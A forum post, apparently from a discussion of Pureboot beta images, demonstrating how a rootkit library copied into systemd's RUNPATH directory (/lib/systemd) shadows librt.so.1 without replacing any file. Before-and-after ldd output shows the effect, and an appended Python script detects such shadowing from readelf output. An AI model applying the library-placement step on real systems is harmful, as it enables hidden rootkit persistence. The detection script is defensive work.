Pureboot R19 preview 1 beta/test images now available

Except when the rootkit devs know they should avoid replacing files, and just add a new one that systemd will happily load and execute:

```
### before:
# ldd /usr/bin/systemd | grep librt
  librt.so.1 => /lib/x86_64-linux-gnu/librt.so.1 (0x00007f3605d00000)

### attack:
# readelf -d /usr/bin/systemd | grep RUNPATH
  0x000000000000001d (RUNPATH)            Library runpath: [/lib/systemd]
# cp /tmp/malicious/rootkit/librt.so.1 /lib/systemd/librt.so.1

### after:
# ldd /usr/bin/systemd | grep librt
  librt.so.1 => /lib/systemd/librt.so.1 (0x00007fe100cd7000)
```
2 Likes
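A detection-side check for the RUNPATH shadowing shown in the post above, as an added example that is not part of the original post: it reads `readelf -d` output and reports any library in a RUNPATH/RPATH directory that has the same name as one in the default loader directories. The function names, the `DEFAULT_DIRS` list, and the `SAMPLE` text are assumptions constructed for illustration.

```python
import os
import re

# Assumed default loader directories for a Debian-style x86_64 system.
DEFAULT_DIRS = ["/lib/x86_64-linux-gnu", "/usr/lib/x86_64-linux-gnu", "/lib", "/usr/lib"]

def parse_dynamic(readelf_text):
    """Extract (runpath_dirs, needed_libs) from `readelf -d` output."""
    needed = re.findall(r"\(NEEDED\)\s+Shared library: \[([^\]]+)\]", readelf_text)
    dirs = []
    pattern = r"\((?:RUNPATH|RPATH)\)\s+Library r(?:un)?path: \[([^\]]*)\]"
    for value in re.findall(pattern, readelf_text):
        dirs.extend(p for p in value.split(":") if p)
    return dirs, needed

def find_shadowing(readelf_text, root="/", default_dirs=DEFAULT_DIRS):
    """Return (runpath_file, shadowed_default_file, directly_needed) tuples."""
    def real(path):  # map an absolute path under `root` (lets tests use a temp tree)
        return os.path.join(root, path.lstrip("/"))
    runpath_dirs, needed = parse_dynamic(readelf_text)
    findings = []
    for rdir in runpath_dirs:
        if not os.path.isdir(real(rdir)):
            continue
        for name in sorted(os.listdir(real(rdir))):
            if ".so" not in name:
                continue
            for ddir in default_dirs:
                if ddir != rdir and os.path.exists(real(os.path.join(ddir, name))):
                    findings.append((os.path.join(rdir, name), os.path.join(ddir, name), name in needed))
                    break
    return findings

# Constructed sample in the format readelf prints; not captured from a real system.
SAMPLE = """\
 0x0000000000000001 (NEEDED)             Shared library: [librt.so.1]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000001d (RUNPATH)            Library runpath: [/lib/systemd]
"""

if __name__ == "__main__":
    import subprocess, sys
    text = SAMPLE
    if len(sys.argv) > 1:  # e.g. python3 check.py /usr/bin/systemd
        text = subprocess.run(["readelf", "-d", sys.argv[1]], capture_output=True, text=True, check=True).stdout
    for hit in find_shadowing(text):
        print("shadowed: %s overrides %s (direct dependency: %s)" % hit)
```

A hit is a lead rather than proof of tampering; confirm it by checking whether the flagged file belongs to an installed package.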